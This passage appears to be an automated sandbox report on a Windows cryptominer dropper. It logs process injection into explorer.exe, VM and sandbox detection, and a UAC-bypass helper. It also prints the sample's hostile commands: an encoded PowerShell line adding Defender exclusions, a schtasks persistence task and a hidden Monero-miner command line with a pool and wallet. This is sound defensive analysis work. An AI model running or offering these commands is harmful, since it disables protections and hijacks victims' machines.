Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Memory allocated: 1800000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Memory allocated: 1B550000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4236	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5588	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 2200
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 435
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 2626

Source: C:\Windows\System32\conhost.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_5-1249

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe TID: 6428	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4540	Thread sleep time: -11068046444225724s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe

5_2_00007FF6FE422F80

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 35000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 35000
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 35000
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 35000
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 35000

Source: conhost.exe, 00000012.00000002.2237873600.0000025C7E4D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: conhost.exe, 00000012.00000002.2234497400.0000025C64234000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\
Source: conhost.exe, 00000012.00000002.2237873600.0000025C7E4D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe

Code function: 5_2_00007FF6FE425280 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_00007FF6FE425280

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Code function: 5_2_00007FF6FE425280 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF6FE425280
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Code function: 5_2_00007FF6FE424D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF6FE424D5C
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Code function: 5_2_00007FF6FE425424 SetUnhandledExceptionFilter,	5_2_00007FF6FE425424

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe

Network Connect: 45.76.89.70 80

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 236C4F60000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1EC44910000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 2474E5A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 25C64110000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1D90D160000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 24457CD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 2A914300000 protect: page execute and read and write	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Thread created: C:\Windows\System32\conhost.exe EIP: C4F60000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 44910000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 4E5A0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 64110000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: D160000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 57CD0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 14300000	Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: Base64 decoded <#kke#>Add-MpPreference <#ifv#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#crq#> -Force <#cyg#>
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: Base64 decoded <#kke#>Add-MpPreference <#ifv#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#crq#> -Force <#cyg#>			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtCreateThreadEx: Direct from: 0x401A17	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtWriteVirtualMemory: Direct from: 0x401D57	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtProtectVirtualMemory: Direct from: 0x401DD7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtClose: Direct from: 0x401CD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtAllocateVirtualMemory: Direct from: 0x401D97	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\conhost.exe

Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140000000 value: 4D	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140001000 value: 48	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140367000 value: 1E	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 1404A0000 value: F0	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140753000 value: 00	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140775000 value: 48	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140776000 value: C5	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140777000 value: 48	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140779000 value: 48	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 14077B000 value: 60	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 14077C000 value: 00	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 14077D000 value: 00	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: FC1010 value: 00	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\conhost.exe

Thread register set: target process: 1320

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Memory written: C:\Windows\System32\conhost.exe base: 236C4F60000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory written: C:\Windows\System32\conhost.exe base: 1EC44910000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory written: C:\Windows\System32\conhost.exe base: 2474E5A0000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140000000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140001000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140367000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 1404A0000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140753000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140775000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140776000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140777000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140779000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 14077B000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 14077C000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 14077D000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: FC1010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory written: C:\Windows\System32\conhost.exe base: 25C64110000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D90D160000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory written: C:\Windows\System32\conhost.exe base: 24457CD0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory written: C:\Windows\System32\conhost.exe base: 2A914300000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe

Code function: GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,wcscat_s,malloc,wcscpy_s,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,_wcsicmp,CloseHandle,_wcsicmp, \explorer.exe

5_2_00007FF6FE4211C0

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAawBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAZgB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAcgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAeQBnACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Users\user\AppData\Local\Temp\Cool.exe "C:\Users\user\AppData\Local\Temp\Cool.exe"	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe "C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Cool.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Local\Temp\services64.exe "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6012 -ip 6012
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6012 -s 880

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagsaawblacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagkazgb2acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagmacgbxacmapgagac0argbvahiaywblacaapaajagmaeqbnacmapga="
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\explorer.exe c:\windows\explorer.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-stealth
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagsaawblacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagkazgb2acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagmacgbxacmapgagac0argbvahiaywblacaapaajagmaeqbnacmapga="	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\explorer.exe c:\windows\explorer.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-stealth	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe

Code function: 5_2_00007FF6FE421A60 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,LookupAccountSidW,GetLastError,wcscpy_s,FreeSid,GlobalFree,

5_2_00007FF6FE421A60

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Queries volume information: C:\Users\user\Desktop\GcqJPBLD2Q.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
